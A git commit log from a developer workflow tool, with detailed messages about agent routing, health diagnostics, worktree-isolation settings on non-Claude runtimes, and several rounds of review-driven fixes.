Option A per-plan specialist routing: a plan with an `agent_hint:` frontmatter field is dispatched to that subagent instead of gsd-executor when it resolves on the active runtime; absent/unresolved/disabled falls back to gsd-executor (byte-identical). Default-on via workflow.agent_hint_routing.

- src/phase.cts: parse agent_hint into the plan-index JSON (plan_json.agent_hint)
- agent-install-check.cts: resolveAgentHint() reuses getAgentsDir + runtime filename variants; probes project + global agent dirs; fails closed; rejects path-traversing names
- gsd-tools.cjs: 'resolve-agent' query route (fail-closed to gsd-executor; --raw/--json)
- execute-phase.md: lean per-plan reference + {EXECUTOR_TYPE} placeholder (host stays under the ADR-857 Phase 6 byte ceiling)
- execute-phase/steps/per-plan-executor-routing.md: resolution logic (Agent()-based dispatch; advisory on orchestrator-worktree)
- config: workflow.agent_hint_routing (validKey, default-on via SCHEMA_DEFAULTS, boolean validator)
- docs (CONFIGURATION.md, plan-md.md), changeset, tests/agent-hint-routing-1689.test.cjs (17 tests)

* chore(#1689): backfill changeset PR number (#3417)

* chore(#1689): regenerate install-tree fixtures for new workflow fragment

* chore(#1689): ack deliberate execute-phase.md growth (agent_hint routing)

* test(#1689): SPAWN contract allows parameterized subagent_type placeholder

agent-frontmatter's spawn-type checks scanned subagent_type="..." as a
concrete agent name. execute-phase now uses subagent_type="{EXECUTOR_TYPE}"
(a runtime placeholder resolved via resolve-agent, default gsd-executor).
Skip {TOKEN} placeholders in both the known-type and <available_agent_types>
checks; execute-phase still lists the built-in roster incl. gsd-executor.

* fix(#1689): CI conformance for the routing fragment

- per-plan-executor-routing.md: add the canonical runtime-launcher preamble to
  its gsd_run block (runtime-launcher-parity #373), matching sibling step fragments.
- agent-install-check.cts: drop a literal ~/.claude/agents path from the
  resolveAgentHint JSDoc so it does not leak into the compiled engine .cjs
  (cline install leak guard).

---------

Co-authored-by: sim <sim@local>
2026-08-13 23:10:52 -04:00
Tom Boucher
d30c99bc92 chore(#3421): delete orphan verify-phase workflow, migrate live gates to verifier (#3422)
* chore(#1892): delete orphan verify-phase workflow, migrate live gates to verifier reference

* test(#1892): retarget structural suites from verify-phase.md to verifier-phase-gates.md

* chore(#1892): reword retired-workflow mentions for removed-but-needed lint

* test(#1892): correct stale surface labels in retargeted suites

* docs(#1892): add verifier-phase-gates row to locale inventories

* chore(#3421): backfill changeset pr number

---------

Co-authored-by: sim <sim@local>
2026-08-13 21:22:03 -04:00
Tom Boucher
b77b7f8e56 fix(#1526): delegate auto-chain post-completion to transition workflow (#3419)
* fix(#1526): delegate auto-chain post-completion to transition workflow

execute-phase's auto-chain completion called phase.complete then a light inline
set (partial PROJECT.md update + offer-next) and never invoked the transition
workflow, silently skipping graduation scan, session-continuity, project-reference,
accumulated-context, and current-position updates — so a phase completed via
auto-chain left different project state than a normal transition.

Fix (delegate, user decision 2026-08-13): replace execute-phase's update_project_md
+ offer_next with a delegation step that @-includes transition.md in post-completion
mode. Add a post_completion_mode step to transition.md that skips verify_completion
+ update_roadmap_and_state (phase.complete already ran; avoids double-write) and
begins at evolve_project. Standalone transition (mode 1) is unchanged.

Regression: tests/auto-chain-transition-delegation.test.cjs (source-text-is-the-
product) asserts the delegation, the skip-set, the removed inline step, and the mode.
Ack fragment 1526 covers execute-phase.md + transition.md growth (spent 2930 fragment
removed — same-path owner conflict, like #3025/#3024).

* docs(#1526): backfill changeset PR number (#3419)

---------

Co-authored-by: sim <sim@local>
2026-08-13 20:31:55 -04:00
Tom Boucher
622c10b2c6 fix(#3025): refuse cross-runtime skill sync in sync-skills (#3404)
* fix(#3025): refuse cross-runtime skill sync in sync-skills

Skill content and directory layout are runtime-specific — the installer
applies per-runtime converters, adapter headers, brand swaps, and layout
rules at install time, and grok/gemini resolve to ANOTHER runtime's skills
root. A verbatim cross-runtime cp -r therefore produces content the installer
would never have written for the destination, and can damage a runtime the
user never named. #3024 (closed) un-masked this, making the corruption live.

Fix (option b, user decision): add a functional Step 1 guard that refuses
any --to != --from with an actionable installer pointer, before any
resolution or copy. Identity sync (--from == --to) remains a no-op. The
non-functional Step 5 comment is replaced; Arguments/Limitations updated.

Regression: tests/sync-skills-cross-runtime-refuse.test.cjs (source-text-
is-the-product) asserts the guard exits non-zero for cross-runtime, points
at the installer, precedes the cp -r copy, and preserves identity.

* docs(#3025): backfill changeset PR number (#3404)

---------

Co-authored-by: sim <sim@local>
2026-08-13 16:17:10 -04:00
sim
041414c4ad feat(#3309): generate health.md's error-code and repair-action tables
Closes the issue's explicit acceptance criterion: "health.md's tables
are generated rather than hand-maintained, closing the 16-vs-30+
documentation gap structurally." The published roster listed 16 codes
against 30+ actually emitted; W010-W017 and W020-W023 had never been
documented.

Adds description/repairable as static fields on Rule (health-diagnostic-types.cts)
— generation needs a fixed, human-readable summary per code, distinct
from the dynamic per-instance Diagnostic.message a rule's check()
produces. repairable is true only when --repair will actually apply
the remedy: false for ADVISE-only rules AND for DESTRUCTIVE-risk rules
(regenerateState/resetConfig), which are described but never
auto-applied — matches verify.cts's diagnosticToIssueEntry semantics
exactly, after fixing E004/E005's static field to agree with it (both
were wrongly true, an inconsistency caught during this same commit's
own review, not left for later).

New scripts/gen-health-docs.cjs (--write/--check, wired into
lint:generated-sync) regenerates the two tagged table regions in
gsd-core/workflows/health.md from RULES (31 rules) plus the 3
pre-checks that stay outside the rule table by design (E001, E010,
I010) plus a small static Effect/Risk lookup for the 6 real repair
actions — including addAiIntegrationPhaseKey, live in code since an
earlier phase but never documented until now. 34 error-code rows, 6
repair-action rows. The table's old "grep verify.cts for the next free
number" footnote is rewritten to point at the rule table and its lint
guard instead.
2026-08-13 03:13:25 -04:00
Behruz Nassre Esfahani
f0abdb1b89 fix(#2486): do not recommend or persist Claude-only worktree isolation on non-Claude runtimes (#2531)
* fix(#2486): runtime-branch the settings worktrees question + W020 health diagnostic

On non-Claude runtimes /gsd:settings offered "Yes (Recommended)" for
worktree isolation and persisted workflow.use_worktrees: true — the exact
value the execution workflows fail closed on (#1521 guards). Branch the
question on the same stamped config-get runtime read the guards use:
Claude keeps the unchanged question; non-Claude offers only
"No (Recommended)" / "Leave unchanged", never persists true, and warns
when the config carries an inherited explicit true. /gsd:health gains
W020, surfacing such a config with the guards' own predicate before
execution-time failure. Docs state the runtime-conditional default.

Fixes #2486

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>

* chore(#2486): add changeset for PR #2531

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>

* fix(#2486): reassign the health worktrees check W020 -> W024 (verify.cts namespace collision)

The workflow-level check collided with the live W020 (git-worktree-list
health) emitted by cmdValidateHealth in src/verify.cts — invisible from
health.md's error_codes table, which stops at W019 and under-represents
the real namespace (W010-W017, W020-W023 all live). W024 verified free.
Adds a regression test pinning the chosen code against src/verify.cts so
a future assignment cannot silently collide, a table note naming the
namespace owner, and the changeset body reworded to house style.

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>

* fix(#2486): pre-select the recommended repair in the broken-inheritance case

Review round 2: at settings.md:142 the pre-selection rule left "Leave
unchanged" as the default when the config carried an explicit
non-false use_worktrees — the exact broken state the adjacent notice
warns about, so accepting the default kept a config that fails closed
at execution time. "Leave unchanged" is now the default only when the
key is absent (nothing to repair); explicit false AND explicit
non-false both pre-select "No (Recommended)", aligning the default,
the label, and the notice.

Pinned by two source-contract assertions in the #2486 regression
block. Goldens (settings.md hash x19) + size baseline regenerated.

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>

* fix(#2486): gate the worktrees question on dispatch.isolation, not the runtime name

Review round 2: #2584 Phase 3 replaced the runtime-name test with a
declared `dispatch.isolation` capability, invalidating this PR's
premise. cursor declares harness-worktree and codex/opencode/kimi/
kimi-code declare orchestrator-worktree, so a `RUNTIME != claude` gate
blocked a supported configuration on five runtimes and false-warned in
health.

- settings.md + health.md read `query dispatch-isolation` and branch on
  `ISOLATION = none`; the runtime-name read is gone from both, and the
  capability read needs no per-runtime stamping (it fail-closes unknown/
  undocumented internally)
- all "Claude Code-only primitive" prose rewritten, including the two
  gates the shell-syntax check missed (config-key list, JSON schema
  comment)
- W024 reconciled across health.md + CONFIGURATION.md + planning-config.md
  (docs still said W020, which collides with a verify.cts code)
- health.md error-codes table fixed: the namespace note no longer sits
  between rows orphaning I001
- the asymmetry note for the two workflows #2584 has not migrated
  (quick.md, diagnose-issues.md) is enforced by a set-equality test with
  a self-check table, so it cannot go stale in either direction

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>

* docs(#2486): restore the Executor isolation section clobbered by #2661

`46ba02ac` (feat(#2630), the current next tip) reverted docs/CONFIGURATION.md
to a pre-#2584 state: it restored the old "Non-Claude note" wording on the
workflow.use_worktrees row and deleted the whole "Executor isolation per
runtime" section. The change is unrelated to that PR's phase-estimation
feature and looks like a stale-copy edit.

This PR's use_worktrees row links to #executor-isolation-per-runtime, so the
deletion leaves a dangling anchor. Restored byte-for-byte from a40ee8a5 (the
text #2584 Phase 3 originally shipped). No link/anchor checker exists in
scripts/ or tests/, so CI would not have caught the dead link.

The reverted row wording is outside this PR's scope and is still wrong on
next; reported upstream as #2668.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* test(#2486): acknowledge the emitted size growth for settings.md and health.md

The #2723 differential attribution check (epic #2719 Phase 3) landed on next
after this branch opened and gates emitted-file growth behind a committed
acknowledgment. Both grown files are attributable to source this PR changes;
the ack names them and says why, per ADR-2719 §3.

Verified load-bearing: removing tests/emitted-drift-ack.json reproduces the
same failure; restoring it passes 59/59.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* fix(#2486): reword the W024 remediation so it names no bare gsd-tools call

The W024 warning told the user to run `gsd-tools query config-set`, a
command-position bare invocation that fails with "command not found" on a
shim-only install (#2751) — the diagnostic sent the user into a second,
more confusing error than the one it reported. The remediation now names
only `/gsd:settings` and the config key itself, both of which work on
every install layout, and the #2751 command-position gate goes green.

Fixes #2486

* fix(#2486): drop the Known-asymmetry note and its guard test — #2728 migrates both workflows

Review Major 2: once #2728 lands, the note describes a gap that no longer
exists and instructs maintainers not to do the thing that was just done —
with the set-equality guard test pinning the stale prose green. This PR now
depends on #2728 (declared in the PR body), so the note and its guard go.

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>

* test(#2486): make the #2728 merge order enforceable instead of advisory

settings.md recommends and persists `workflow.use_worktrees: true` for every
runtime whose declared dispatch.isolation is not `none` — cursor
(harness-worktree) and codex/opencode/kimi/kimi-code (orchestrator-worktree).
quick.md and diagnose-issues.md consume that value at dispatch time and, while
they still gate on the runtime NAME, FATAL for all five. Merged first, this PR
reintroduces #2486's own shape for the exact runtimes it exists to help — on
the path it now labels "Recommended".

The dependency was stated only as prose in the PR body. A merge-order note is
not a gate: an automated batch merge never reads it. This adds the check that
makes the ordering structural — red while either sibling is still name-gated,
green the moment #2728 lands.

The predicate matches a RUNTIME-vs-"claude" comparison, not the legitimate
runtime-identity read, and accepts either the inline canonical
dispatch-isolation read or a reference to dispatch-isolation-gate.md, which is
the shape #2728 gives quick.md. Verified both directions against real sources:
red against the current workflows, green against #2728's.

This also closes W024's coverage window. W024 fires only when ISOLATION is
`none`, so it is structurally blind to these five runtimes — /gsd:health would
report healthy right up until quick.md FATALs. W024 cannot see the hazard, so
the hazard is prevented by making the unsafe ordering unmergeable rather than
by warning after the fact.

Separately, the W-code namespace-collision test now declares its source read
instead of passing lint silently: verify.cts emits its codes as inline string
literals across ~25 addIssue() calls and exports no enumerable registry, so
there is nothing to require() and assert against. The gap, and what it costs,
are stated in the test.

* docs(#2486): use the hyphen command form for /gsd-health in CONFIGURATION.md

docs/ is never passed through the install-time slash-form converters, so the
colon form names a command no runtime registers. Clears the sole
lint-docs-command-form violation attributable to this PR.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>

* fix(#2486): resolve isolation via new side-effect-free inspect-dispatch-isolation query; scope the settings change to isolation-none runtimes

Review round 4:

- B1: /gsd:health and /gsd:settings no longer call the recording
  dispatch-isolation query — on current next it persists the resolved
  decision to the executor-isolation sentinel as an unconditional #3045
  side effect, letting a read-only diagnostic hard-block executor
  dispatch for the sentinel's lifetime across sessions. Both surfaces now
  use inspect-dispatch-isolation, a new read-only verb sharing the exact
  resolution implementation (extracted resolveDispatchIsolationDecision)
  with zero writes. Behavioral tests pin: no sentinel write, per-runtime
  parity with the recording verb, recording knobs ignored, --json shape.

- B2: the #2728 merge-order interlock test is deleted — a repo test
  cannot sequence merges; it only made this PR unmergeable on its own
  schedule. The settings behavior change is scoped entirely to the
  ISOLATION=none branch, which needs nothing from #2728; the != none
  path is base behavior unchanged.

- M1: the W024-vs-verify.cts namespace test (an admitted source-grep) is
  deleted per RULESET.TESTS.delete-bad-tests, without a standing
  exemption; the namespace claim lives as guidance in health.md.

- M2: remaining allow-test-rule exemptions re-derived into documented
  categories (source-text-is-the-product, integration-test-input) with
  issue refs per ADR-456.

- Minor: settings.md's current-value read drops the stampable
  --default/fallback so key-absence stays distinguishable from an
  explicit false on non-Claude emits (the pre-selection rule depends on
  the tri-state); docs now present inspect-dispatch-isolation as the
  inspection command and name dispatch-isolation as the recording
  resolver.

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>

* fix(#2486): put the install-marker rung in the canonical runtime resolver

Round-7 review (independent cross-AI pass over the whole PR).

BLOCKER — the gate did not fire in the default case. `resolveRuntime`
stopped at GSD_RUNTIME > config.runtime > 'claude', and
`config-new-project` writes NO `runtime` key — so on a real non-Claude
install every consumer believed it was on Claude: isolation reported
`harness-worktree`, /gsd:settings still offered "Yes (Recommended)" and
W024 stayed silent. That is #2486's own symptom, surviving the fix meant
to remove it. Verified end-to-end on a real `--qwen` install with a
runtime-neutral config and GSD_RUNTIME unset: pre-fix `harness-worktree`,
fixed `none`.

The rung lives in `resolveRuntime` (src/runtime-slash.cts), the ONE
canonical resolver, not in the isolation call site. A per-consumer fix
forks precedence: `inspect-dispatch-isolation` would answer `cursor` while
`dispatch-should-flatten` and `resolve-dispatch-type` still answered
`claude` for the same install. All three now agree. `readInstallRuntimeMarker`,
its cache and its test seams MOVED from model-resolver.cts to
runtime-slash.cts, with model-resolver re-exporting the seams — one marker
read and one cache, not two that drift.

Deliberately NOT `resolveActiveRuntime`/`loadConfig`: an intermediate
revision of this fix routed through `loadConfig`, which normalizes and
rewrites legacy keys back to disk. That gave `inspect-dispatch-isolation`
— the verb whose entire purpose is being side-effect-free — a write side
effect, which is the defect the verb exists to avoid. `resolveRuntime`
reads .planning/config.json directly. Re-verified: the inspect query
against a real install creates no `.gsd/`.

Tests, both of which were too weak in the first attempt and are now
fail-first proven:
- The W024 behavioral stub returned success-with-empty-output for an absent
  key. Real `config-get` EXITS NON-ZERO, and the `|| echo "true"` fallback
  only triggers on failure — so reintroducing the fallback would have passed.
  The stub now returns 1 for the absent case.
- The marker regression asserted on the exported helper, so reverting
  gsd-tools.cjs to a marker-blind resolver still passed. It now drives a real
  `--qwen` install through the shipped `inspect-dispatch-isolation` query.
  (GSD_TEST_MODE must be cleared for that child, or install.js no-ops while
  still exiting 0 — a green test over an install that wrote nothing.)
  Spawned through `installSpawnEnv()` so ambient GSD_HOME cannot leak in.

Also: the three PR-added `try/finally` test bodies converted to `t.after()`
per CONTRIBUTING; CONTEXT.md's `worktree create` UNCONSUMED claim corrected
(Phase 3 calls it in executor-isolation-dispatch.md); docs/CONFIGURATION.md
now states the current non-Claude `use_worktrees` default rather than
describing capability-scoped stamping that lands with #2652; resolver
precedence comments updated to name the marker rung.

Refs #2486
Refs #2668

* fix(#2486): split the marker rung out; make the use_worktrees doc row order-independent

Round-8 review. trek-e's Blocker was procedural — commit 10fba7b8 moved the
per-install .gsd-runtime marker rung into the canonical resolver, a large
blast-radius change that arrived undisclosed and unreviewed. They offered
two remedies; taking the second: SPLIT IT OUT.

src/runtime-slash.cts and src/model-resolver.cts are reverted to their next
state and the marker regression test is removed. What remains is what this
PR was filed for: the settings.md / health.md / gsd-tools.cjs isolation
query, W024, and the #2668 docs restoration.

COST, stated plainly rather than buried: without that rung this PR's gate
resolves 'claude' on a non-Claude install whose project config carries no
`runtime` key — which is every config config-new-project writes. On those
installs W024 stays quiet and /gsd-settings still offers Worktrees. The gate
is correct whenever the runtime IS resolvable (GSD_RUNTIME set, or an
explicit config.runtime). That is why `Fixes #2486` is already downgraded to
`Refs` — #2486 must not close until the residual lands. A KNOWN LIMITATION
comment at the resolver call site names #2395 so this does not read as an
oversight.

The rung itself belongs to #2395, which reports this exact defect and was
closed by #2446 — a PR that touched only bin/install.js and fixtures and
never runtime-slash.cts, so it persisted the identity into
~/.gsd/defaults.json, a tier resolveRuntime does not read. Evidence and a
reopen request are posted there. That same tier is #2566's B1.

DOCS — the reviewer flagged that this row and #2728's are order-dependent:
whichever merges second falsifies the other. Removed the dependency instead
of picking an order. The "Current default … until #2652" paragraph is now a
plain troubleshooting note, true before and after #2728 lands.

CONFLICT — one hunk in CONTEXT.md: next added the #2596 scope-conformance
interface to the same Worktree-Safety paragraph where this PR corrected the
`worktree create` UNCONSUMED claim. Resolved keeping both.

Verified: lint:ci green. Full suite clean apart from the pre-existing
#1160 installed-runtime capability surface. (emitted-attribution also failed
until the fork's stale next was fast-forwarded — it defaults to origin/next,
which was 131 commits behind; 175/175 against the current base.)

Refs #2486
Refs #2668

* fix(#2486): address round-9 review — distinguish "cannot resolve" from "declares none", reject recording-only args on the read verb

Codex review of the whole PR, five findings, all verified against source first.

Major 3 (the one real defect). Both surfaces read isolation as
`ISOLATION=$(… || echo "none")`, so a resolver failure became indistinguishable
from a genuine `dispatch.isolation: none` declaration — and W024's text then
asserts the latter, telling a user their runtime declares no executor-isolation
primitive when GSD simply could not find out. health.md and settings.md now
capture the raw value and track ISOLATION_RESOLVED, the same shape
references/dispatch-isolation-gate.md already uses (#2652 review). W024 gained a
second message for the unresolved case; settings still fails closed there — it
must never persist a `true` it cannot justify — but reports what happened rather
than a verdict it never reached.

Major 4. `dispatch-isolation` applies --force-isolation AFTER the shared
resolver returns; inspection accepted the flag and silently ignored it, so the
same argv yielded 'none' from one verb and the declared capability from the
other. inspect-dispatch-isolation now rejects --force-isolation/--phase/--plan
as usage errors. Verified by mutation: disabling the guard reds exactly the
three new rejection tests.

Major 1. settings.md claimed this flow and the execution guards "always reach
the same verdict". False while quick.md still gates on the runtime name: an
orchestrator-worktree host can be offered a `true` that /gsd:quick rejects as
fatal, W024 silent because isolation is not none. Scoped the claim to the
capability gate, named #2728 as the conversion, and added the same caveat to the
CONFIGURATION.md use_worktrees row. Not a behavior change — the `!= none` branch
is untouched base behavior.

Major 2. "side-effect-free" overstated it: every gsd-tools invocation runs the
shared bootstrap, and getActiveWorkstream unlinks a stale workstream pointer.
That is pre-existing, verb-independent and cannot block a dispatch; writing the
sentinel can. Renamed the claim to "sentinel-free" everywhere and documented
precisely what is and is not asserted.

Minor 5. The JSON parity test asserted against a handwritten key list and never
invoked the recording verb, so the two could diverge and stay green. It now runs
`dispatch-isolation --json` in a separate project dir and deep-compares, with a
control asserting that verb DID write a sentinel. Added the orchestrator exec
branch (--cwd-target) the registry parity test never covered.

runtime-converters.test.cjs pinned the old `|| echo "none"` line as canonical —
that literal was the Major 3 defect. Repinned as two invariants (the raw read is
present; the collapsing fallback is absent) plus an ISOLATION_RESOLVED
requirement, so reformatting does not fail the test but a semantic regression
does.

settings.md sits at 40777 bytes against the 40960 DEFAULT hard cap. The
round-9 prose was compressed to fit rather than raising the cap.

Validated: lint:ci clean; full suite green except the two failures that
reproduce identically on pristine next @ 33fca50d (#1160 _resolveManifest, and
the #3053 quick_id tests, which compare a local-time expectation against a
TZ=UTC child and so only pass on a UTC host).

* fix(#2486): second review pass — drop a dangling reference, correct the whole unresolved branch, pin the branch behaviorally

Codex re-review of the full PR after the first round-9 pass. It confirmed Majors
1, 2 and 4 and Minor 5 fixed, and found seven more. All verified against source.

Minor 5 was mine and the worst of them: settings.md and health.md pointed at
`gsd-core/references/dispatch-isolation-gate.md`, which exists only on the #2728
branch — not in this PR and not on the merge-base. Merging this alone would have
shipped three dangling canonical-source references. Removed; the surrounding
text now stands on its own.

Major 2. The unresolved branch corrected only the two option descriptions. The
pre-selection rationale still claimed an absent key already resolves to false on
this runtime, and the explicit-true notice still stated the runtime declares no
primitive — both capability verdicts that were never reached. The substitution
rule now covers every place in that branch that asserts one.

Major 3. The repinned invariants could not catch the mutation they existed to
catch: flipping the shipped block's ISOLATION_RESOLVED=true to false left all
three green, since they only assert the raw read is present, the token appears,
and the collapsing fallback is gone. Added a behavioral test that drives the
shipped W024 block twice — resolver answering vs resolver exiting non-zero — and
asserts the two emit different text, that the unresolved branch says "could not
resolve", and that it does NOT claim the runtime has no primitive. Verified: the
true->false mutation now reds it.

Major 1. The verb fail-closes an unknown or undeclared runtime to `none` and
exits 0, so ISOLATION_RESOLVED=true means "the query answered", not "the runtime
published a declaration" — the shell cannot see an internal fallback. Exposing
provenance is an API change and out of scope here, so W024's resolved-case text
is instead written to be true of every path that reaches it ("no usable
executor-isolation primitive — declared or fail-closed from an unknown value"),
and both workflows state the limit of the signal explicitly.

Minor 4. The rejection tests regex-matched human prose, so swapping
ERROR_REASON.USAGE for UNKNOWN would have kept them green while breaking machine
consumers. They now pass --json-errors and assert reason === 'usage' on the
parsed envelope.

Minor 6. CONTEXT.md still described the verb as side-effect-free. Now
sentinel-free, consistent with the router comment and the other two surfaces.

Minor 7. 183 bytes of headroom under the 40960 hard cap was called
unacceptable, and it was — a routine 184-byte edit would have failed CI.
Compressed this PR's own settings.md prose (the #2486 block was carrying ~7.1KB
of rationale) to 40499 bytes, 458 free. Two phrases other tests pin verbatim
were restored after the first compression pass reworded them.

Validated: lint:ci clean; full suite green except the two failures that
reproduce identically on pristine next @ 33fca50d.

* fix(#2486): third review pass — placeholder table replaces the fragile substitution rule

Codex round 3 blocked the push on two Majors. Both verified and real.

Major 2 was the substantive one and my error. The round-2 fix told the model to
find and replace the string "this runtime declares no executor-isolation
primitive (dispatch.isolation: none)" — text that does not appear anywhere in
the branch. The first option description has no parenthetical, the second
asserts "absent, it already resolves to false on this runtime" (not covered at
all), and the pre-selection rationale and notice carried three more unsupported
assertions. A model following the instruction literally would have found no
match and changed nothing.

Replaced with three named placeholders — {FINDING}, {CONSEQUENCE}, {ABSENCE} —
and a two-column table giving each one's resolved and unresolved wording. Every
assertion in the branch now flows from the table, so none of them can outrun
what was actually established, and there is no string-matching to get wrong. It
is also shorter than the prose it replaced.

Major 1: the resolver catches thrown errors and returns none successfully, a
path the round-2 wording ("declared, or unknown/undeclared") did not cover.
Both surfaces now say "declared as none, or fail-closed because the capability
could not be determined", which is true of the thrown path too, and both state
that an internal resolution error is among the things the verb fail-closes.
Still not provenance — the verb cannot distinguish these for the caller — but no
longer a claim the code contradicts.

Minor 3: the behavioral test asserted only that the two branches differ and that
the resolved one omits "could not resolve", so arbitrary resolved text stayed
green. Now pins what it must positively say: the capability finding, the
fail-closed consequence, the offending key, and (both branches) the repair
command.

Minor 4: two stale artifacts the round-2 sweep missed — a test comment still
citing the #2728-only references/dispatch-isolation-gate.md, and the emitted
drift ack still describing inspection as side-effect-free. Also aligned the two
remaining router comments to sentinel-free.

settings.md 40420 bytes, 540 free under the cap.

Validated: lint:ci clean; full suite green except the two failures that
reproduce identically on pristine next @ 33fca50d.

* fix(#2486): fourth review pass — stop recommending a repair whose effect depends on the emit

Codex round 4, one Major and three Minors. The Major is a real hole and worth
the round.

W024 advised "remove the key from .planning/config.json so the runtime default
(false) applies". That default is not false everywhere: execute-phase.md:102,
quick.md:155 and diagnose-issues.md:62 all read the key as
`|| echo "true"`, and only `_stampNonClaudeRuntimeDefaults` rewrites them to
`--default false` on a non-Claude emit. So on an un-stamped emit the advised
repair leaves use_worktrees resolving to TRUE against isolation none — exactly
the state W024 exists to flag. Reachable in the round-3 gap: a caught internal
resolver error returns none with rc=0, so ISOLATION_RESOLVED is true and the
confident branch fires on a host whose emit was never stamped.

Fixed by removing the dependence rather than the symptom: both surfaces now say
to set workflow.use_worktrees false explicitly, and say why deleting the key is
not equivalent. The {ABSENCE} placeholder no longer claims absence resolves to
false unconditionally — it is scoped to an emit that stamped that default.

Minor: the notice and W024 hardcoded .planning/config.json, which is the wrong
file in an active workstream (settings itself resolves $GSD_CONFIG_PATH
correctly). Both now say "the project config", naming the workstream case.

Minor: the new repair pin required the literal /gsd:settings, a form documented
as no longer routable. Relaxed to accept the canonical slash and $-prefixed
forms so a correct rewording cannot fail the test.

Nit: two test descriptions still said side-effect-free.

Not fixed, deliberately: the verb still cannot tell a caught resolver error from
a declared none, so ISOLATION_RESOLVED remains a signal about the CALL, not the
declaration. Both workflows now state that limit outright. Exposing provenance
is a change to the query contract that belongs with the runtime-resolution work
in #2395, not here.

Validated: lint:ci clean; full suite green except the two failures that
reproduce identically on pristine next @ 33fca50d. The only change after that
suite run was removing a redundant regex escape flagged by eslint; that test was
re-run individually and eslint is clean.

* fix(#2486): fifth review pass — stop recommending "leave it absent" as the safe default

Codex round 5, one Major: the round-4 fix corrected the {ABSENCE} wording but
left the pre-selection rule built on the assumption it had just falsified. An
absent key still pre-selected "Leave unchanged" on the rationale that there was
nothing to repair. Absence resolves to false only where the emit stamped that
default; on an un-stamped emit it reads as true, so accepting the recommended
default could preserve the exact isolation-none-plus-true state this branch
exists to prevent.

The isolation-none branch now pre-selects "No (Recommended)" in every case,
including an absent key. Writing an explicit false is correct under either emit;
"Leave unchanged" stays available for the deliberate shared-config case but is
never the default. The test that pinned the old rule pinned a falsified
assumption, so it now pins the new one and asserts the old sentence is gone.

Also tightened the round-4 repair regex, which had been relaxed far enough to
accept `$gsd:settings` and `/gsd:settings-bogus`. It now matches only the
canonical `/gsd-settings`, `/gsd:settings` and `$gsd-settings` forms.

settings.md 40685 bytes, 275 free.

Validated: lint:ci clean; full suite green except the two failures that
reproduce identically on pristine next @ 33fca50d.

* fix(#2486): make the inspection exemption block-scoped, and drop the last pre-#2728 claim

Codex review of the conflict resolution: one Major, two Minors, all real.

Major. The inspection-surface exemption I added to #2728's "every dispatch-site
degrade block re-records" guard was FILE-wide. Codex probed it by adding an
unrecorded executor block to health.md: the exemption assertions still passed,
the whole file was skipped, and the offender went unreported. That is the same
hole the hand-listed revision of this guard had — a promise of "every dispatch
site" with a silent carve-out.

Now scoped per block. A block earns the exemption only by resolving through
`inspect-dispatch-isolation` AND carrying no dispatch primitive (`Agent(`,
`harnessFlag`/`HARNESS_FLAG`, `isolation="worktree"`, or the recording verb).
The file-level assertions remain as a precondition on top. Verified with Codex's
own probe: the appended dispatch block is now reported at health.md:285, while
the legitimate inspection block still passes.

Minor. settings.md still carried the caveat saying `quick.md` gates on the
runtime name and "#2728 converts that surface". #2728 has landed. Same obsolete
premise already removed from docs/CONFIGURATION.md in the merge commit; this was
the copy I missed. Removing it also returns 413 bytes, so settings.md now has
688 free under the 40960 cap rather than 275.

Minor. Four scratch-directory prefixes still read `w024` after the renumber.
Non-functional, but the whole point of the rename was that W024 now means
someone else's warning.

Validated: lint:ci clean; full suite green except the two failures that
reproduce identically on pristine next.

* fix(#2486): name the diagnostics' state INSPECTED_ISOLATION and delete the exemption

Codex probed the per-block exemption and it was still escapable: DISPATCH_PRIMITIVE
matched only `Agent(`, two harness-flag spellings, `isolation="worktree"` and the
recording verb, so `Task(`, `spawn_agent(`, a `codex exec` process dispatch, and —
unfixably by any regex — the repo's normal split shape (isolation resolved in one
bash fence, dispatch in a later one) all still qualified as exempt.

Took Codex's suggested fix, which is better than the one it replaces. The
diagnostics now name their state `INSPECTED_ISOLATION` / `INSPECTED_RESOLVED` /
`_INSPECTED_RAW` instead of reusing the dispatch-site names. #2728's guard scans
for a literal `ISOLATION=none`, so health.md and settings.md fall outside it BY
CONSTRUCTION and the exemption is deleted outright — no carve-out to escape, and
a diagnostic that ever writes a real `ISOLATION=none` is caught like any other
site. The name is also just more accurate: an inspection result is not a dispatch
decision.

Pinned so the reasoning cannot be lost: the #2486 suite now asserts neither
diagnostic assigns the bare `ISOLATION` name, with the rationale in the comment.
Verified by mutation — renaming back makes #2728's guard flag health.md:107 AND
fails the new naming pin.

Net effect on the guard's coverage is positive: before this PR it scanned two
fewer files by exemption; now it scans everything.

settings.md 40352 bytes, 608 free.

Validated: lint:ci clean; full suite green except the two failures that reproduce
identically on pristine next.

---------

Co-authored-by: Claude Fable 5 <noreply@anthropic.com>
2026-08-12 20:45:08 -04:00
Rezolv
3dff700aaa fix(#3102): render edge-probe coverage report so the resolution loop consumes it (#3391)
* fix(#3102): render edge-probe coverage report so the resolution loop consumes it

Step 5.5 captured the edge-probe report into $COVERAGE, shape-checked it, and
reduced it to coverage.applicable — the engine's per-requirement items[] never
reached the model, so the resolution loop re-derived edge categories from prose
(the data-flow twin of #2733's control-flow discard). The block's own comment
claimed the opposite.

Render $COVERAGE RAW into context after the well-formedness guard (schema-agnostic
so an ADR-550 D7a-style re-cut cannot desync a bespoke renderer), and bind the rows
in the resolution loop as a deterministic FLOOR the model unions with its own
classification — floor, never ceiling, since the classifier has a measured recall
gap (ADR-857 §98 / ADR-550 D7b). --auto consumes the same floor. Comment corrected
to match. Regression test asserts a bare render of $COVERAGE, not a count-only cross.

* chore(#3102): add changeset for the Step 5.5 edge-coverage render fix

* chore(#3102): re-arm spec-phase.md emitted-drift ack for the Step 5.5 render growth

The render + floor-binding prose grows spec-phase.md ~1818 bytes (32238 -> 34056,
under the 40960 cap). Re-arms the existing spent spec-phase.md ack rather than adding
a new fragment (a second key would collide with the base-relative duplicate check).
2026-08-12 20:44:57 -04:00
Dennis Kim
68a199cf5a fix(#2783): address wedged PRs in ship note protocol (#2818)
* fix(#2783): address wedged PRs in ship note protocol

